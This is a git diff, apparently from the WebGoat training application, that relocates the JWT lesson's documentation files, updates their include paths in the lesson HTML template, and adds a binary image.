rename to src/main/resources/lessons/jwt/documentation/JWT_decode.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_final.adoc b/src/main/resources/lessons/jwt/documentation/JWT_final.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_final.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_final.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries.adoc b/src/main/resources/lessons/jwt/documentation/JWT_libraries.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_libraries.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment.adoc b/src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment2.adoc b/src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment2.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_assignment2.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_libraries_assignment2.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_solution.adoc b/src/main/resources/lessons/jwt/documentation/JWT_libraries_solution.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_libraries_solution.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_libraries_solution.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_login_to_token.adoc b/src/main/resources/lessons/jwt/documentation/JWT_login_to_token.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_login_to_token.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_login_to_token.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_mitigation.adoc b/src/main/resources/lessons/jwt/documentation/JWT_mitigation.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_mitigation.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_mitigation.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_plan.adoc b/src/main/resources/lessons/jwt/documentation/JWT_plan.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_plan.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_plan.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_refresh.adoc b/src/main/resources/lessons/jwt/documentation/JWT_refresh.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_refresh.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_refresh.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_refresh_assignment.adoc b/src/main/resources/lessons/jwt/documentation/JWT_refresh_assignment.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_refresh_assignment.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_refresh_assignment.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_signing.adoc b/src/main/resources/lessons/jwt/documentation/JWT_signing.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_signing.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_signing.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_signing_solution.adoc b/src/main/resources/lessons/jwt/documentation/JWT_signing_solution.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_signing_solution.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_signing_solution.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_storing.adoc b/src/main/resources/lessons/jwt/documentation/JWT_storing.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_storing.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_storing.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_structure.adoc b/src/main/resources/lessons/jwt/documentation/JWT_structure.adoc
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_structure.adoc
rename to src/main/resources/lessons/jwt/documentation/JWT_structure.adoc
diff --git a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_weak_keys b/src/main/resources/lessons/jwt/documentation/JWT_weak_keys
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_weak_keys
rename to src/main/resources/lessons/jwt/documentation/JWT_weak_keys
diff --git a/webgoat-lessons/jwt/src/main/resources/html/JWT.html b/src/main/resources/lessons/jwt/html/JWT.html
similarity index 92%
rename from webgoat-lessons/jwt/src/main/resources/html/JWT.html
rename to src/main/resources/lessons/jwt/html/JWT.html
index 20097ca15..fdf7a5fa6 100644
--- a/webgoat-lessons/jwt/src/main/resources/html/JWT.html
+++ b/src/main/resources/lessons/jwt/html/JWT.html
@@ -3,14 +3,14 @@
 <html xmlns:th="http://www.thymeleaf.org">
 <body>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_plan.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_structure.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_structure.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_decode.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_decode.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <form id="decode" class="attack-form" method="POST" name="form" action="/WebGoat/JWT/decode">
@@ -35,10 +35,10 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_login_to_token.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_login_to_token.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_signing.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_signing.adoc"></div>
 
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/jwt.css}"/>
     <script th:src="@{/lesson_js/jwt-voting.js}" language="JavaScript"></script>
@@ -102,7 +102,7 @@
 
 <div class="lesson-page-wrapper">
     <div class="lesson-page-solution">
-        <div class="adoc-content" th:replace="doc:JWT_signing_solution.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_signing_solution.adoc"></div>
     </div>
 </div>
 
@@ -112,7 +112,7 @@
     <link rel="stylesheet" type="text/css" th:href="@{/css/quiz.css}"/>
     <script th:src="@{/js/quiz.js}" language="JavaScript"></script>
     <link rel="import" type="application/json" th:href="@{/lesson_js/questions_jwt.json}"/>
-    <div class="adoc-content" th:replace="doc:JWT_libraries_assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_libraries_assignment.adoc"></div>
     <div class="attack-container">
         <div class="attack-feedback"></div>
         <div class="attack-output"></div>
@@ -134,18 +134,18 @@
 
 <div class="lesson-page-wrapper">
     <div class="lesson-page-solution">
-        <div class="adoc-content" th:replace="doc:JWT_libraries_assignment2.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_libraries_assignment2.adoc"></div>
     </div>
 </div>
 
 <div class="lesson-page-wrapper">
     <div class="lesson-page-solution">
-        <div class="adoc-content" th:replace="doc:JWT_libraries_solution.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_libraries_solution.adoc"></div>
     </div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_weak_keys"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_weak_keys"></div>
     <script th:src="@{/lesson_js/jwt-weak-keys.js}" language="JavaScript"></script>
     <pre id="secrettoken"></pre>
 
@@ -173,11 +173,11 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_refresh.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_refresh.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_refresh_assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_refresh_assignment.adoc"></div>
 
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/jwt.css}"/>
     <script th:src="@{/lesson_js/bootstrap.min.js}" language="JavaScript"></script>
@@ -299,7 +299,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_final.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_final.adoc"></div>
 
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/jwt.css}"/>
     <script th:src="@{/lesson_js/bootstrap.min.js}" language="JavaScript"></script>
@@ -359,8 +359,8 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:JWT_mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/jwt/documentation/JWT_mitigation.adoc"></div>
 </div>
 </body>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/jwt/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/jwt/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/jwt/images/challenge1-small.png b/src/main/resources/lessons/jwt/images/challenge1-small.png
new file mode 100644
index 0000000000000000000000000000000000000000..a4fbc347015e27eb350ff0ab06a68081ad26f231
GIT binary patch
literal 11722
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
